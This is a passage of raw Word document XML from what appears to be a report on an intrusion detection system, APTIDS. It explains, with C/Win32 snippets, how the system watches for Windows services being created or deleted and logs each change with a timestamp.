          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>that stores a so call security definition for creating an event.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secAttribute.nLength =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SECURITY_ATTRIBUTES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w: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secAttribute.lpSecurityDescriptor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secAttribute.bInheritHandle = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w: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notifyEventHandle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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateEventEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;secAttribute,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CREATE_EVENT_INITIAL_SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserv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EVENT_ALL_ACCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2799">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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1D2799" w:rsidRDefault="001D2799" w:rsidP="001D2799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRDefault="00C66A05" w:rsidP="001D2799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SvcChangeNotify calls OpenSCManager to get a SCM handle</w:t>
      </w:r>
      <w:r w:rsidR="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the “desire access” is SC_MANAGER_ENUMERATE_SERVICE for SCM handle has a permission to enumerate Windows Services.</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while</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scManagerHandle = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OpenSCManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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SC_MANAGER_ENUMERATE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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(scManagerHandle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L"Cannot open SC Manager ! \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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C66A05" w:rsidRDefault="00C66A05" w:rsidP="00C66A0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C66A05">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="00C66A05" w:rsidP="004D43D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">SvcChangeNotify then calls NotifyServiceStatusChange, a Windows API for notifying any change happened to SCM. </w:t>
      </w:r>
      <w:r w:rsidR="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChange takes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The SCM handle </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A DWORD value which is SERVICE_NOTIFY_CREATED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> xor SERVICE_NOTIFY_DELETED indicates that NotifyServiceStatusChange will monitor any service which is created or deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRPr="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A pointer to notifyBuffer, which is a struct object for storing information about the event handle, the callback context </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the pointer to the callback function to be executed when events happen.</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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChangeW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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scManagerHandle,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SERVICE_NOTIFY_CREATED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">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SERVICE_NOTIFY_DELETED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRDefault="00C66A05" w:rsidP="00C66A0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&amp;notifyBuffer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00C66A0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4D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">NotifyCallback is a function which is executed when an event happened. SvcChangeNotify calls NotifyServiceStatusChange, this function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> NotifyCallback to a APC queue which is executed next time NotifyServiceStatusChange is called again. SvcChangeNotify then calls WaitForSingleObject to wait for any event happen, and the thread will be halt until any event is capture by WaitForSingleObject. When an event happens, WaitForSingleObject return control to the thread, a while loop then executes NotifyServiceStatusChange again, for its to execute any function in its APC queue, which is NotifyCallback.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while</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;notifyBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(SERVICE_NOTIFYW));</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notifyBuffer.dwVersion = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SERVICE_NOTIFY_STATUS_CHANGE</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notifyBuffer.pfnNotifyCallback = &amp;NotifyCallback;</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notifyBuffer.pContext = (</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CALLBACK_CONTEXT*) pstCallbackContext;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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChangeW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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scManagerHandle,</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SERVICE_NOTIFY_CREATED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">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SERVICE_NOTIFY_DELETED</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&amp;notifyBuffer);</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(dwResult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Wait for Notify Callback function</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WaitForSingleObjectEx(pstCallbackContext-&gt;hNotifyEventHandler, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>INFINITE</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(dwResult == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SERVICE_NOTIFY_CLIENT_LAGGING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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In case SCM lags</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L"Client Lagging !\n"</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Sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5);</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//End while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="004D43D6" w:rsidRDefault="002565A7"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eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NoitifyCallback processes any operation which must be taken in case an event happened.</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>VOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CALLBACK</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NotifyCallback(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>pParameter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wchTime;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">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PSERVICE_NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> notifyBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PSERVICE_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>pParameter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="000D022A">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0D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When NotifyServiceStatusChange successfully captures an event, based on the event types, NotifyCallback alert a suitable log message.</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(notifyBuffer-&gt;dwNotificationStatus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L"System Services Modified !\n"</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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (notifyBuffer-&gt;dwNotificationTriggered) {</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SERVICE_NOTIFY_CREATED</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L"Service Created: "</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notifyBuffer-&gt;pszServiceNames + (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)1);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,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SERVICE_NOTIFY_DELETED</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L"Service Deleted: "</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notifyBuffer-&gt;pszServiceNames);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,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0D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77A88" w:rsidRDefault="00993912" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc485303748"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Log Module</w:t>
      </w:r>
      <w:r w:rsidR="00B77A88">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In APTIDS, Log Module perform </w:t>
      </w:r>
      <w:r w:rsidR="00BE47BE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations. Firstly, “getDateTime” is called to get the current time and date at which an event occurs, using a function called “localtime”.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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>VOID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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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ret_timeBuffer</w:t>
      </w:r>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wRet_timeBuffer</w:t>
      </w:r>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time_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> rawtime;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tm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> * timeinfo;</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timeBuffer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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">80,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CHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>));</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time(&amp;rawtime);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timeinfo = localtime(&amp;rawtime);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912"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strftime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">timeBuffer, 80, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"[%d-%m-%Y %I:%M:%S] "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, timeinfo);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
